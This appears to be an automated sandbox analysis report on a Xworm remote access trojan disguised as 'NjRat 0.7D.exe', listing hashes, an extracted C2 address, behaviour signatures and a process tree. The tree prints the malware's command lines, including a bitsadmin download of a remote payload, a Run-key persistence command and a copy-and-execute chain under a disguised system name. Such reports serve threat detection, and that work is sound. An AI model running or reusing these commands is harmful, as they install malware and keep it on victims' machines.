Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-08-2024 10:24

General

  • Target

    NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe

  • Size

    8.9MB

  • MD5

    3e8dc9ba82863bd3c1e5ec769d2c187f

  • SHA1

    fa80a09b2a6804868c26dbeb62b073d1546a132b

  • SHA256

    6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880

  • SHA512

    10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c

  • SSDEEP

    196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm

Malware Config

Extracted

  • Family
    xworm
  • C2
    83.143.112.30:3096
  • Mutex
    Dza3YLL2q2qcgzdH
  • aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up the country code configured in the registry, likely used as a geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
    "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
      "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2948
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\System32\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
        3⤵
        • Download via BitsAdmin
        PID:2932
    • C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 9
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3604
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4792
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 20 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 20
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4848
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 20
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3624
        • C:\Windows\Isolation graphique de périphérique audio Windows .exe
          "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of AdjustPrivilegeToken
            PID:3716
          • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
            "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4468
            • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
              "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4544

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WatchDog.exe.log

    Filesize

    1KB

    MD5

    7dca233df92b3884663fa5a40db8d49c

    SHA1

    208b8f27b708c4e06ac37f974471cc7b29c29b60

    SHA256

    90c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c

    SHA512

    d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07

  • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe

    Filesize

    8.5MB

    MD5

    70ea9c044c9a766330d3fe77418244a5

    SHA1

    18602d0db52917b88cbdab84ba89181e6fd4686a

    SHA256

    b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5

    SHA512

    5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe

    Filesize

    76KB

    MD5

    0e362e7005823d0bec3719b902ed6d62

    SHA1

    590d860b909804349e0cdc2f1662b37bd62f7463

    SHA256

    2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

    SHA512

    518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    78B

    MD5

    771228b914581d4c92cb184ecf761d22

    SHA1

    858b7e3e6ff6191dc7fd561510d24c3fb424ed8f

    SHA256

    ba4755fd48143ad928ffb6cc38ef749b1f11ddb204a04856d32ea53c967d448c

    SHA512

    41537a8d5cbe04a53cf9c5f8eea68cc045b5c05336bcce162c88c00a66021511afbb5d1083b7883bc0e30e22f6d35d7421df486d25a102621f972bb1b5b3b1bf

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    81B

    MD5

    0017979068fbfbd0fe002d93eed5fcd0

    SHA1

    e8cdad526e0698a58a1ef1818785bd1915137615

    SHA256

    669c02322dda6a727344f84900f27e07aab26f54c16319aefac42d8b602f4a2c

    SHA512

    dd819ffaf1e09af7f54ce515fd936e775ecdf6a82cbe53dac72f0ca1da024b8dd3fc8f3e94c8c48f2a4d5a9e942afd73ebb1d114c016363e1023b3b947bd6a11

  • C:\Users\Admin\AppData\Roaming\audiodg.exe

    Filesize

    355KB

    MD5

    d9dfa8ba182529445890b5021e159b77

    SHA1

    64f8724f8cd76adff12364e6bb2fc9eaceadb1ba

    SHA256

    60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f

    SHA512

    d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

  • C:\Users\Admin\AppData\Roaming\install.vbs

    Filesize

    19KB

    MD5

    4724c9dce57bc0472ed610ba16d08894

    SHA1

    d5fea3520146ccbf54c31b3b4868de499022fb37

    SHA256

    aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb

    SHA512

    d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18

  • memory/1960-34-0x00000000000F0000-0x000000000014E000-memory.dmp

    Filesize

    376KB

  • memory/1960-35-0x00000000059D0000-0x0000000005F74000-memory.dmp

    Filesize

    5.6MB

  • memory/1960-36-0x0000000005420000-0x00000000054B2000-memory.dmp

    Filesize

    584KB

  • memory/1960-37-0x00000000054C0000-0x000000000555C000-memory.dmp

    Filesize

    624KB

  • memory/1960-38-0x0000000005370000-0x000000000537A000-memory.dmp

    Filesize

    40KB

  • memory/1960-39-0x0000000006F30000-0x0000000006F72000-memory.dmp

    Filesize

    264KB

  • memory/2772-0-0x00007FF9FB583000-0x00007FF9FB585000-memory.dmp

    Filesize

    8KB

  • memory/2772-2-0x00007FF9FB580000-0x00007FF9FC041000-memory.dmp

    Filesize

    10.8MB

  • memory/2772-33-0x00007FF9FB580000-0x00007FF9FC041000-memory.dmp

    Filesize

    10.8MB

  • memory/2772-1-0x0000000000410000-0x0000000000D08000-memory.dmp

    Filesize

    9.0MB

  • memory/2948-20-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-44-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-43-0x0000000074852000-0x0000000074853000-memory.dmp

    Filesize

    4KB

  • memory/2948-16-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-14-0x0000000074852000-0x0000000074853000-memory.dmp

    Filesize

    4KB

  • memory/3716-51-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/4004-48-0x0000000000580000-0x00000000005DE000-memory.dmp

    Filesize

    376KB

  • memory/4004-49-0x0000000007250000-0x000000000726A000-memory.dmp

    Filesize

    104KB

  • memory/4004-50-0x0000000007270000-0x0000000007276000-memory.dmp

    Filesize

    24KB

  • memory/4468-64-0x0000000000EE0000-0x0000000000EFA000-memory.dmp

    Filesize

    104KB